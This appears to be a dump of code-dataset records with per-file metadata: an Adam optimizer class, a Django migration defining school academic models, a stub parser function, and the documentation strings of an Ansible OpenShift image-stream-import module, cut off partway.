    """Adam optimizer.

    Combines momentum (first moment ``_m``) with an RMS-style second
    moment ``_v``.  NOTE(review): this implementation applies no bias
    correction, and ``beta2`` defaults to 0.9 rather than the usual
    0.999 -- both kept as-is to preserve existing behaviour.
    """

    def __init__(self, learning_rate, decay_rate=1, beta1=0.9, beta2=0.9):
        '''
        Parameters
        ----------
        learning_rate : float
        decay_rate : float
            Decay rate for learning rate
        beta1 : float
            Should be between 0 to 1.
        beta2 : float
            Should be between 0 to 1.
        '''
        self._learning_rate = learning_rate
        self._decay_rate = decay_rate
        self._beta1 = beta1
        self._beta2 = beta2
        # First- and second-moment accumulators.
        self._m = 0
        self._v = 0

    @property
    def _mdecay_rate(self):
        return self._decay_rate

    @property
    def _mlearning_rate(self):
        return self._learning_rate

    @_mlearning_rate.setter
    def _mlearning_rate(self, learning_rate):
        self._learning_rate = learning_rate

    def _optimize(self, parameter, parameter_gradient):
        # Numerical-stability constant (10e-8, i.e. 1e-7).
        stability = 10e-8
        # First moment: exponential average of gradients (momentum).
        self._m = self._beta1 * self._m + (1 - self._beta1) * parameter_gradient
        # Second moment: exponential average of squared gradients (RMS).
        self._v = self._beta2 * self._v + (1 - self._beta2) * (parameter_gradient**2)
        # Combine both moments into the parameter update.
        step = -self._learning_rate * self._m
        return parameter + step / ((self._v**0.5) + stability)
| 26.97026
| 93
| 0.609786
| 809
| 7,255
| 5.127318
| 0.103832
| 0.159113
| 0.142719
| 0.072324
| 0.795805
| 0.778447
| 0.751205
| 0.738428
| 0.738428
| 0.724687
| 0
| 0.014023
| 0.302136
| 7,255
| 268
| 94
| 27.070896
| 0.805254
| 0.215851
| 0
| 0.810606
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.265152
| false
| 0.030303
| 0.015152
| 0.098485
| 0.469697
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0945cb2990e92af8549ceb800820bbd6325efbe
| 11,989
|
py
|
Python
|
src/AE_academico/migrations/0001_initial.py
|
furthz/Colegio
|
573e9e4006c0d1cd33190b53da5988fdc0c9ca4c
|
[
"MIT"
] | 2
|
2017-09-26T14:15:43.000Z
|
2018-03-19T01:03:28.000Z
|
src/AE_academico/migrations/0001_initial.py
|
furthz/Colegio
|
573e9e4006c0d1cd33190b53da5988fdc0c9ca4c
|
[
"MIT"
] | 1
|
2017-10-21T22:30:39.000Z
|
2017-10-21T22:30:39.000Z
|
src/AE_academico/migrations/0001_initial.py
|
furthz/Colegio
|
573e9e4006c0d1cd33190b53da5988fdc0c9ca4c
|
[
"MIT"
] | 9
|
2017-07-22T16:13:29.000Z
|
2020-11-12T21:03:36.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-22 20:08
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the AE_academico app.

    Auto-generated by Django 1.11.3 (see file header). Defines the academic
    entities: classrooms (Aula), courses (Curso), their links, schedules,
    events, attendance, academic periods and grades. Every model carries the
    same audit columns (fecha_/usuario_ creacion/modificacion) plus, in most
    cases, an ``activo`` flag.

    NOTE(review): already-applied migrations should not be edited; make
    schema changes in a new migration instead.
    """

    initial = True

    dependencies = [
        ('register','0002_register'),
        ('enrollment', '0001_initial'),
        ('APIs', '0001_initial'),
    ]

    operations = [
        # Classroom, linked to the service type it hosts.
        migrations.CreateModel(
            name='Aula',
            fields=[
                ('id_aula', models.AutoField(primary_key=True)),
                ('tipo_servicio', models.ForeignKey(db_column="id_tipo_servicio", to='enrollment.TipoServicio')),
                ('nombre', models.CharField(max_length=100, blank=True, null=True)),
                #('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
                #('tipo', models.IntegerField()),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10,null=True)),
                ('usuario_modificacion', models.CharField(max_length=10,null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                #'db_table': 'tipo_servicio',
                # Table creation is toggled by the deployment settings flag.
                'managed': settings.IS_MIGRATE,
                #'managed': False,
            },
        ),
        # Course offered by a school (colegio).
        migrations.CreateModel(
            name='Curso',
            fields=[
                ('id_curso', models.AutoField(primary_key=True)),
                ('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
                ('nombre', models.CharField(max_length=100, blank=True, null=True)),
                ('descripcion', models.CharField(max_length=500, blank=True, null=True)),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                #'db_table': 'servicio',
                'managed': settings.IS_MIGRATE,
                #'managed': False,
            },
        ),
        # Join table: which courses are taught in which classroom.
        migrations.CreateModel(
            name='AulaCurso',
            fields=[
                ('id_aula_curso', models.AutoField(primary_key=True)),
                ('aula', models.ForeignKey(db_column="id_aula", to='AE_academico.Aula')),
                ('curso', models.ForeignKey(db_column="id_curso", to='AE_academico.Curso')),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                # 'db_table': 'matricula',
                'managed': settings.IS_MIGRATE,
                # 'managed': False,
            },
        ),
        # Teacher assignment; ``tutor`` marks the homeroom teacher.
        migrations.CreateModel(
            name='CursoDocente',
            fields=[
                ('id_curso_docente', models.AutoField(primary_key=True)),
                ('docente', models.ForeignKey(db_column="id_docente", to='register.Docente')),
                # NOTE(review): field named 'curso' but it references AulaCurso
                # (db_column id_aula_curso) -- confirm naming is intended.
                ('curso', models.ForeignKey(db_column="id_aula_curso", to='AE_academico.AulaCurso')),
                ('tutor', models.BooleanField(default=False)),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                # 'db_table': 'matricula',
                'managed': settings.IS_MIGRATE,
                # 'managed': False,
            },
        ),
        # Weekly timetable slot for a course.
        migrations.CreateModel(
            name='HorarioAula',
            fields=[
                ('id_horario_aula', models.AutoField(primary_key=True)),
                ('curso', models.ForeignKey(db_column="id_curso", to='AE_academico.Curso')),
                ('docente', models.ForeignKey(db_column="id_docente", to='register.Docente')),
                ('lugar', models.CharField(max_length=50)),
                ('dia', models.CharField(max_length=10)),
                ('hora_inicio', models.TimeField()),
                ('hora_fin', models.TimeField()),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                # 'db_table': 'matricula',
                'managed': settings.IS_MIGRATE,
                # 'managed': False,
            },
        ),
        # School event with an optional announcement (comunicado).
        migrations.CreateModel(
            name='Evento',
            fields=[
                ('id_evento', models.AutoField(primary_key=True)),
                ('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
                ('encargado', models.ForeignKey(db_column="id_personal", to='register.Personal')),
                ('nombre', models.CharField(max_length=100, blank=True, null=True)),
                ('descripcion', models.CharField(max_length=500, blank=True, null=True)),
                ('fecha_evento', models.DateField()),
                ('hora_inicio', models.TimeField()),
                ('hora_fin', models.TimeField()),
                ('comunicado', models.ForeignKey(db_column="id_comunicado", to='APIs.Comunicado', null=True, blank=True)),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                # 'db_table': 'matricula',
                'managed': settings.IS_MIGRATE,
                # 'managed': False,
            },
        ),
        # Per-student attendance record.
        # NOTE(review): unlike the other models, no 'activo' flag here --
        # confirm whether that omission is intentional.
        migrations.CreateModel(
            name='Asistencia',
            fields=[
                ('id_asistencia', models.AutoField(primary_key=True)),
                ('alumno', models.ForeignKey(db_column='id_alumno', to='register.Alumno')),
                #('curso', models.ForeignKey(db_column='id_curso', to='AE_academico.Curso')),
                ('fecha', models.DateField()),
                ('estado_asistencia', models.IntegerField()),
                ('comentario', models.CharField(max_length=500, blank=True, null=True)),
                ('comunicado', models.ForeignKey(db_column="id_comunicado", to='APIs.Comunicado', null=True, blank=True)),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
            ],
            options={
                # 'db_table': 'matricula',
                'managed': settings.IS_MIGRATE,
                # 'managed': False,
            },
        ),
        # Academic period (term/semester) per school.
        migrations.CreateModel(
            name='PeriodoAcademico',
            fields=[
                ('id_periodo_academico', models.AutoField(primary_key=True)),
                ('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
                ('nombre', models.CharField(max_length=50)),
                ('fecha_inicio', models.DateField()),
                ('fecha_fin', models.DateField()),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                # 'db_table': 'matricula',
                'managed': settings.IS_MIGRATE,
                # 'managed': False,
            },
        ),
        # Grade for a student in a course during an academic period.
        migrations.CreateModel(
            name='Notas',
            fields=[
                ('id_nota', models.AutoField(primary_key=True)),
                ('curso', models.ForeignKey(db_column="id_curso", to='AE_academico.Curso')),
                ('colegio', models.ForeignKey(db_column="id_colegio", to='register.Colegio')),
                ('periodo_academico', models.ForeignKey(db_column="id_periodo_academico", to='AE_academico.PeriodoAcademico')),
                ('alumno', models.ForeignKey(db_column='id_alumno', to='register.Alumno')),
                ('nota', models.CharField(max_length=2)),
                ('comunicado', models.ForeignKey(db_column="id_comunicado", to='APIs.Comunicado', null=True, blank=True)),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                # 'db_table': 'matricula',
                'managed': settings.IS_MIGRATE,
                # 'managed': False,
            },
        ),
        # Join table: which enrollments (matriculas) belong to which classroom.
        migrations.CreateModel(
            name='AulaMatricula',
            fields=[
                ('id_aula_matricula', models.AutoField(primary_key=True)),
                ('aula', models.ForeignKey(db_column="id_aula", to='AE_academico.Aula')),
                ('matricula', models.ForeignKey(db_column="id_matricula", to='enrollment.Matricula')),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                # 'db_table': 'matricula',
                'managed': settings.IS_MIGRATE,
                # 'managed': False,
            },
        ),
        # Scheduled reminder attached to a classroom.
        migrations.CreateModel(
            name='RecordatorioAula',
            fields=[
                ('id_recordatorio_aula', models.AutoField(primary_key=True)),
                ('aula', models.ForeignKey(db_column="id_aula", to='AE_academico.Aula')),
                ('nombre', models.CharField(max_length=50, blank=False, null=False)),
                ('descripcion', models.CharField(max_length=200, blank=True, null=True)),
                ('fecha_programacion', models.DateField(blank=False, null=False)),
                ('estado', models.IntegerField()),
                ('fecha_creacion', models.DateField()),
                ('fecha_modificacion', models.DateField()),
                ('usuario_creacion', models.CharField(max_length=10, null=True)),
                ('usuario_modificacion', models.CharField(max_length=10, null=True)),
                ('activo', models.BooleanField()),
            ],
            options={
                # 'db_table': 'matricula',
                'managed': settings.IS_MIGRATE,
                # 'managed': False,
            },
        ),
    ]
| 46.649805
| 127
| 0.535658
| 1,042
| 11,989
| 5.963532
| 0.107486
| 0.082073
| 0.098487
| 0.131316
| 0.825394
| 0.781783
| 0.762472
| 0.762472
| 0.747345
| 0.740264
| 0
| 0.012563
| 0.316123
| 11,989
| 256
| 128
| 46.832031
| 0.745335
| 0.060556
| 0
| 0.688679
| 1
| 0
| 0.194766
| 0.006587
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018868
| 0
| 0.037736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c08b0c28ae17c5c9a349c6f727086a9b3709c9e
| 139
|
py
|
Python
|
property_bag/__init__.py
|
cbigler/python-property-bag
|
a877fda91c88731405415e936dd26c6677ee897f
|
[
"MIT"
] | null | null | null |
property_bag/__init__.py
|
cbigler/python-property-bag
|
a877fda91c88731405415e936dd26c6677ee897f
|
[
"MIT"
] | null | null | null |
property_bag/__init__.py
|
cbigler/python-property-bag
|
a877fda91c88731405415e936dd26c6677ee897f
|
[
"MIT"
] | null | null | null |
from .property_bag import PropertyBag
from .property_bag_parser import PropertyBagParser
def loads(text: str) -> PropertyBag:
    """Parse *text* into a :class:`PropertyBag`.

    Parameters
    ----------
    text : str
        Serialized property-bag content.

    Raises
    ------
    NotImplementedError
        Always -- this entry point is a stub.  The original body was
        ``pass``, which silently returned ``None`` despite the
        ``PropertyBag`` return annotation; raising makes the missing
        implementation explicit instead of handing callers ``None``.
    """
    raise NotImplementedError("property_bag.loads is not implemented yet")
| 15.444444
| 50
| 0.784173
| 17
| 139
| 6.235294
| 0.705882
| 0.226415
| 0.283019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158273
| 139
| 8
| 51
| 17.375
| 0.905983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
1c7d06066a458798285ab12dec2631bdfa22fd13
| 126,121
|
py
|
Python
|
ansible-container/openshift-deploy/roles/ansible.kubernetes-modules/library/openshift_v1_image_stream_import.py
|
LeHack/Docker-network-research
|
62a57a6d723d8701a6d045a07a5abd2bd844a409
|
[
"Beerware"
] | 4
|
2017-06-03T20:46:07.000Z
|
2017-12-19T02:15:00.000Z
|
ansible-container/openshift-deploy/roles/ansible.kubernetes-modules/library/openshift_v1_image_stream_import.py
|
LeHack/Docker-network-research
|
62a57a6d723d8701a6d045a07a5abd2bd844a409
|
[
"Beerware"
] | 1
|
2017-06-03T20:32:37.000Z
|
2017-06-03T20:32:37.000Z
|
ansible-container/openshift-deploy/roles/ansible.kubernetes-modules/library/openshift_v1_image_stream_import.py
|
LeHack/Docker-network-research
|
62a57a6d723d8701a6d045a07a5abd2bd844a409
|
[
"Beerware"
] | null | null | null |
#!/usr/bin/env python
from ansible.module_utils.openshift_common import OpenShiftAnsibleModule, OpenShiftAnsibleException
DOCUMENTATION = '''
module: openshift_v1_image_stream_import
short_description: OpenShift ImageStreamImport
description:
- Manage the lifecycle of a image_stream_import object. Supports check mode, and attempts
to to be idempotent.
version_added: 2.3.0
author: OpenShift (@openshift)
options:
annotations:
description:
- Annotations is an unstructured key value map stored with a resource that may
be set by external tools to store and retrieve arbitrary metadata. They are
not queryable and should be preserved when modifying objects.
type: dict
api_key:
description:
- Token used to connect to the API.
cert_file:
description:
- Path to a certificate used to authenticate with the API.
type: path
context:
description:
- The name of a context found in the Kubernetes config file.
debug:
description:
- Enable debug output from the OpenShift helper. Logging info is written to KubeObjHelper.log
default: false
type: bool
force:
description:
- If set to C(True), and I(state) is C(present), an existing object will updated,
and lists will be replaced, rather than merged.
default: false
type: bool
host:
description:
- Provide a URL for acessing the Kubernetes API.
key_file:
description:
- Path to a key file used to authenticate with the API.
type: path
kubeconfig:
description:
- Path to an existing Kubernetes config file. If not provided, and no other connection
options are provided, the openshift client will attempt to load the default
configuration file from I(~/.kube/config.json).
type: path
labels:
description:
- Map of string keys and values that can be used to organize and categorize (scope
and select) objects. May match selectors of replication controllers and services.
type: dict
name:
description:
- Name must be unique within a namespace. Is required when creating resources,
although some resources may allow a client to request the generation of an appropriate
name automatically. Name is primarily intended for creation idempotence and
configuration definition. Cannot be updated.
namespace:
description:
- Namespace defines the space within each name must be unique. An empty namespace
is equivalent to the "default" namespace, but "default" is the canonical representation.
Not all objects are required to be scoped to a namespace - the value of this
field for those objects will be empty. Must be a DNS_LABEL. Cannot be updated.
password:
description:
- Provide a password for connecting to the API. Use in conjunction with I(username).
spec__import:
description:
- Import indicates whether to perform an import - if so, the specified tags are
set on the spec and status of the image stream defined by the type meta.
aliases:
- _import
type: bool
spec_images:
description:
- Images are a list of individual images to import.
aliases:
- images
type: list
spec_repository__from_api_version:
description:
- API version of the referent.
aliases:
- repository__from_api_version
spec_repository__from_field_path:
description:
- 'If referring to a piece of an object instead of an entire object, this string
should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2].
For example, if the object reference is to a container within a pod, this would
take on a value like: "spec.containers{name}" (where "name" refers to the name
of the container that triggered the event) or if no container name is specified
"spec.containers[2]" (container with index 2 in this pod). This syntax is chosen
only to have some well-defined way of referencing a part of an object.'
aliases:
- repository__from_field_path
spec_repository__from_kind:
description:
- Kind of the referent.
aliases:
- repository__from_kind
spec_repository__from_name:
description:
- Name of the referent.
aliases:
- repository__from_name
spec_repository__from_namespace:
description:
- Namespace of the referent.
aliases:
- repository__from_namespace
spec_repository__from_resource_version:
description:
- Specific resourceVersion to which this reference is made, if any.
aliases:
- repository__from_resource_version
spec_repository__from_uid:
description:
- UID of the referent.
aliases:
- repository__from_uid
spec_repository_import_policy_insecure:
description:
- Insecure is true if the server may bypass certificate verification or connect
directly over HTTP during image import.
aliases:
- repository_import_policy_insecure
type: bool
spec_repository_import_policy_scheduled:
description:
- Scheduled indicates to the server that this tag should be periodically checked
to ensure it is up to date, and imported
aliases:
- repository_import_policy_scheduled
type: bool
spec_repository_include_manifest:
description:
- IncludeManifest determines if the manifest for each image is returned in the
response
aliases:
- repository_include_manifest
type: bool
spec_repository_reference_policy_type:
description:
- Type determines how the image pull spec should be transformed when the image
stream tag is used in deployment config triggers or new builds. The default
value is `Source`, indicating the original location of the image should be used
(if imported). The user may also specify `Local`, indicating that the pull spec
should point to the integrated Docker registry and leverage the registry's ability
to proxy the pull to an upstream registry. `Local` allows the credentials used
to pull this image to be managed from the image stream's namespace, so others
on the platform can access a remote image but have no access to the remote secret.
It also allows the image layers to be mirrored into the local registry which
the images can still be pulled even if the upstream registry is unavailable.
aliases:
- repository_reference_policy_type
ssl_ca_cert:
description:
- Path to a CA certificate used to authenticate with the API.
type: path
username:
description:
- Provide a username for connecting to the API.
verify_ssl:
description:
- Whether or not to verify the API server's SSL certificates.
type: bool
requirements:
- openshift == 1.0.0-snapshot
'''
EXAMPLES = '''
'''
RETURN = '''
api_version:
type: string
description: Requested API version
image_stream_import:
type: complex
returned: on success
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation of an object.
Servers should convert recognized schemas to the latest internal value, and
may reject unrecognized values.
type: str
kind:
description:
- Kind is a string value representing the REST resource this object represents.
Servers may infer this from the endpoint the client submits requests to. Cannot
be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata.
They are not queryable and should be preserved when modifying objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This is used to distinguish
resources with same name and namespace in different clusters. This field
is not set anywhere right now and apiserver is going to ignore it if set
in create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server time when this
object was created. It is not guaranteed to be set in happens-before order
across separate operations. Clients may not set this value. It is represented
in RFC3339 form and is in UTC. Populated by the system. Read-only. Null
for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully terminate before
it will be removed from the system. Only set when deletionTimestamp is
also set. May only be shortened. Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this resource will
be deleted. This field is set by the server when a graceful deletion is
requested by the user, and is not directly settable by a client. The resource
is expected to be deleted (no longer visible from resource lists, and
not reachable by name) after the time in this field. Once set, this value
may not be unset or be set further into the future, although it may be
shortened or the resource may be deleted prior to this time. For example,
a user may request that a pod is deleted in 30 seconds. The Kubelet will
react by sending a graceful termination signal to the containers in the
pod. After that 30 seconds, the Kubelet will send a hard termination signal
(SIGKILL) to the container and after cleanup, remove the pod from the
API. In the presence of network partitions, this object may still exist
after this timestamp, until an administrator or automated process can
determine the resource is fully terminated. If not set, graceful deletion
of the object has not been requested. Populated by the system when a graceful
deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry. Each entry
is an identifier for the responsible component that will remove the entry
from the list. If the deletionTimestamp of the object is non-nil, entries
in this list can only be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server, to generate a
unique name ONLY IF the Name field has not been provided. If this field
is used, the name returned to the client will be different than the name
passed. This value will also be combined with a unique suffix. The provided
value has the same validation rules as the Name field, and may be truncated
by the length of the suffix required to make the value unique on the server.
If this field is specified and the generated name exists, the server will
NOT return a 409 - instead, it will either return 201 Created or 500 with
Reason ServerTimeout indicating a unique name could not be found in the
time allotted, and the client should retry (optionally after the time
indicated in the Retry-After header). Applied only if Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of the desired state.
Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when creating resources,
although some resources may allow a client to request the generation of
an appropriate name automatically. Name is primarily intended for creation
idempotence and configuration definition. Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within which each name must be unique. An empty
namespace is equivalent to the "default" namespace, but "default" is the
canonical representation. Not all objects are required to be scoped to
a namespace - the value of this field for those objects will be empty.
Must be a DNS_LABEL. Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects in the list have
been deleted, this object will be garbage collected. If this object is
managed by a controller, then an entry in this list will point to this
controller, with the controller field set to true. There cannot be more
than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of this object that
can be used by clients to determine when objects have changed. May be
used for optimistic concurrency, change detection, and the watch operation
on a resource or set of resources. Clients must treat these values as
opaque and passed unmodified back to the server. They may only be valid
for a particular resource or set of resources. Populated by the system.
Read-only. Value must be treated as opaque by clients.
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object. It is typically
generated by the server on successful creation of a resource and is not
allowed to change on PUT operations. Populated by the system. Read-only.
type: str
spec:
description:
- Spec is a description of the images that the user wishes to import
type: complex
contains:
_import:
description:
- Import indicates whether to perform an import - if so, the specified tags
are set on the spec and status of the image stream defined by the type
meta.
type: bool
images:
description:
- Images are a list of individual images to import.
type: list
contains:
_from:
description:
- From is the source of an image to import; only kind DockerImage is
allowed
type: complex
contains:
api_version:
description:
- API version of the referent.
type: str
field_path:
description:
- 'If referring to a piece of an object instead of an entire object,
this string should contain a valid JSON/Go field access statement,
such as desiredState.manifest.containers[2]. For example, if the
object reference is to a container within a pod, this would take
on a value like: "spec.containers{name}" (where "name" refers
to the name of the container that triggered the event) or if no
container name is specified "spec.containers[2]" (container with
index 2 in this pod). This syntax is chosen only to have some
well-defined way of referencing a part of an object.'
type: str
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
namespace:
description:
- Namespace of the referent.
type: str
resource_version:
description:
- Specific resourceVersion to which this reference is made, if any.
type: str
uid:
description:
- UID of the referent.
type: str
import_policy:
description:
- ImportPolicy is the policy controlling how the image is imported
type: complex
contains:
insecure:
description:
- Insecure is true if the server may bypass certificate verification
or connect directly over HTTP during image import.
type: bool
scheduled:
description:
- Scheduled indicates to the server that this tag should be periodically
checked to ensure it is up to date, and imported
type: bool
include_manifest:
description:
- IncludeManifest determines if the manifest for each image is returned
in the response
type: bool
reference_policy:
description:
- ReferencePolicy defines how other components should consume the image
type: complex
contains:
type:
description:
- Type determines how the image pull spec should be transformed
when the image stream tag is used in deployment config triggers
or new builds. The default value is `Source`, indicating the original
location of the image should be used (if imported). The user may
also specify `Local`, indicating that the pull spec should point
to the integrated Docker registry and leverage the registry's
ability to proxy the pull to an upstream registry. `Local` allows
the credentials used to pull this image to be managed from the
image stream's namespace, so others on the platform can access
a remote image but have no access to the remote secret. It also
allows the image layers to be mirrored into the local registry
from which the images can still be pulled even if the upstream registry
is unavailable.
type: str
to:
description:
- To is a tag in the current image stream to assign the imported image
to, if name is not specified the default tag from from.name will be
used
type: complex
contains:
name:
description:
- Name of the referent.
type: str
repository:
description:
- Repository is an optional import of an entire Docker image repository.
A maximum limit on the number of tags imported this way is imposed by
the server.
type: complex
contains:
_from:
description:
- From is the source for the image repository to import; only kind DockerImage
and a name of a Docker image repository is allowed
type: complex
contains:
api_version:
description:
- API version of the referent.
type: str
field_path:
description:
- 'If referring to a piece of an object instead of an entire object,
this string should contain a valid JSON/Go field access statement,
such as desiredState.manifest.containers[2]. For example, if the
object reference is to a container within a pod, this would take
on a value like: "spec.containers{name}" (where "name" refers
to the name of the container that triggered the event) or if no
container name is specified "spec.containers[2]" (container with
index 2 in this pod). This syntax is chosen only to have some
well-defined way of referencing a part of an object.'
type: str
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
namespace:
description:
- Namespace of the referent.
type: str
resource_version:
description:
- Specific resourceVersion to which this reference is made, if any.
type: str
uid:
description:
- UID of the referent.
type: str
import_policy:
description:
- ImportPolicy is the policy controlling how the image is imported
type: complex
contains:
insecure:
description:
- Insecure is true if the server may bypass certificate verification
or connect directly over HTTP during image import.
type: bool
scheduled:
description:
- Scheduled indicates to the server that this tag should be periodically
checked to ensure it is up to date, and imported
type: bool
include_manifest:
description:
- IncludeManifest determines if the manifest for each image is returned
in the response
type: bool
reference_policy:
description:
- ReferencePolicy defines how other components should consume the image
type: complex
contains:
type:
description:
- Type determines how the image pull spec should be transformed
when the image stream tag is used in deployment config triggers
or new builds. The default value is `Source`, indicating the original
location of the image should be used (if imported). The user may
also specify `Local`, indicating that the pull spec should point
to the integrated Docker registry and leverage the registry's
ability to proxy the pull to an upstream registry. `Local` allows
the credentials used to pull this image to be managed from the
image stream's namespace, so others on the platform can access
a remote image but have no access to the remote secret. It also
allows the image layers to be mirrored into the local registry
from which the images can still be pulled even if the upstream registry
is unavailable.
type: str
status:
description:
- Status is the result of importing the image
type: complex
contains:
_import:
description:
- Import is the image stream that was successfully updated or created when
'to' was set.
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation of
an object. Servers should convert recognized schemas to the latest
internal value, and may reject unrecognized values.
type: str
kind:
description:
- Kind is a string value representing the REST resource this object
represents. Servers may infer this from the endpoint the client submits
requests to. Cannot be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with a resource
that may be set by external tools to store and retrieve arbitrary
metadata. They are not queryable and should be preserved when
modifying objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This is used
to distinguish resources with same name and namespace in different
clusters. This field is not set anywhere right now and apiserver
is going to ignore it if set in create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server time
when this object was created. It is not guaranteed to be set in
happens-before order across separate operations. Clients may not
set this value. It is represented in RFC3339 form and is in UTC.
Populated by the system. Read-only. Null for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully terminate
before it will be removed from the system. Only set when deletionTimestamp
is also set. May only be shortened. Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this resource
will be deleted. This field is set by the server when a graceful
deletion is requested by the user, and is not directly settable
by a client. The resource is expected to be deleted (no longer
visible from resource lists, and not reachable by name) after
the time in this field. Once set, this value may not be unset
or be set further into the future, although it may be shortened
or the resource may be deleted prior to this time. For example,
a user may request that a pod is deleted in 30 seconds. The Kubelet
will react by sending a graceful termination signal to the containers
in the pod. After that 30 seconds, the Kubelet will send a hard
termination signal (SIGKILL) to the container and after cleanup,
remove the pod from the API. In the presence of network partitions,
this object may still exist after this timestamp, until an administrator
or automated process can determine the resource is fully terminated.
If not set, graceful deletion of the object has not been requested.
